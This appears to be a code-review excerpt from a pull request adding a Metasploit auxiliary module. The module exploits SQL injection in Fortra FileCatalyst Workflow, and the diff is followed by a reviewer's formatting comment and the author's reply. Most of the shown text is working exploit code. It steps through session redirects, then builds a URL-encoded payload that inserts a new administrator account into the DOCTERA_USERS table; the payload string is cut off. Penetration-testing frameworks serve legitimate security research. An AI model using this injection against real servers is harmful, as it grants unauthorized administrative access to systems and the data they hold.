modules/auxiliary/admin/http/fortra_filecatalyst_workflow_sqli.rb

```diff
@@ -0,0 +1,290 @@
+      location_value = ::Regexp.last_match(1).strip
+      print_status("Redirect #1: #{location_value}")
+    else
+      fail_with(Failure::UnexpectedReply, 'Location header not found.')
+    end
+
+    # 4) createNewJob.do
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, location_value.to_s),
+      'headers' => {
+        'Cookie' => "JSESSIONID=#{jsessionid}"
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    raw_res = res.to_s
+    if raw_res =~ /^Location:\s*(.+)$/
+      location_value = ::Regexp.last_match(1).strip
+      print_status("Redirect #2: #{location_value}")
+    else
+      fail_with(Failure::UnexpectedReply, 'Location header not found.')
+    end
+
+    # 5) chooseOrderForm.jsp
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, location_value.to_s),
+      'headers' => {
+        'Cookie' => "JSESSIONID=#{jsessionid}"
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    html = res.get_html_document
+    h2_tag = html.at_css('h2')
+
+    if h2_tag
+      h2_text = h2_tag.text.strip
+      if h2_text == 'Choose an Order Type'
+        print_status('Received expected response.')
+      else
+        fail_with(Failure::UnexpectedReply, 'Unexpected string found inside h2 tag.')
+      end
+    else
+      fail_with(Failure::UnexpectedReply, 'h2 tag not found.')
+    end
+
+    # 5) pdf_servlet (SQL injection)
+    t = Time.now
+    username = datastore['NEW_USERNAME']
+    password = Digest::MD5.hexdigest(datastore['NEW_PASSWORD']).upcase
+    email = datastore['NEW_EMAIL']
+    firstname = Rex::Text.rand_text_alpha(1..6)
+    lastname = Rex::Text.rand_text_alpha(1..6)
+    areacode = rand(100..999)
+    exchangecode = rand(100..999)
+    subscribernumber = rand(1000..9999)
+    phone = format('(%<areacode>03d) %<exchangecode>03d-%<subscribernumber>04d',
+                   areacode: areacode,
+                   exchangecode: exchangecode,
+                   subscribernumber: subscribernumber)
+    creation = "+#{t.strftime('%s%L')}"
+    pw_creationdate = "+#{t.strftime('%s%L')}"
+    lastlogin = "+#{t.strftime('%s%L')}"
+
+    vprint_status('Adding New Admin User:')
+    vprint_status("\tUsername: #{username}")
+    vprint_status("\tPassword: #{datastore['NEW_PASSWORD']} (#{password})")
+    vprint_status("\tEmail: #{email}")
+    vprint_status("\tFirstName: #{firstname}")
+    vprint_status("\tLastName: #{lastname}")
+    vprint_status("\tPhone: #{phone}")
+    vprint_status("\tCreation: #{creation}")
+    vprint_status("\tPW_CreationDate: #{pw_creationdate}")
+    vprint_status("\tLastLogin: #{lastlogin}")
+
+    payload = '1%27%3BINSERT+INTO+DOCTERA_USERS+%28USERNAME%2C+PASSWORD%2C+ENCPASSWORD%2C+FIRSTNAME%2C+LASTNAME%2C+COMPANY%2C' \
```

Comment:
Is there a way to format this a bit better, if only for maintenance/modifications' sake?

Reply:
I've split the string into multiple smaller strings, but I agree that it still does not provide great readability. Do you have any specific suggestions what else could be done?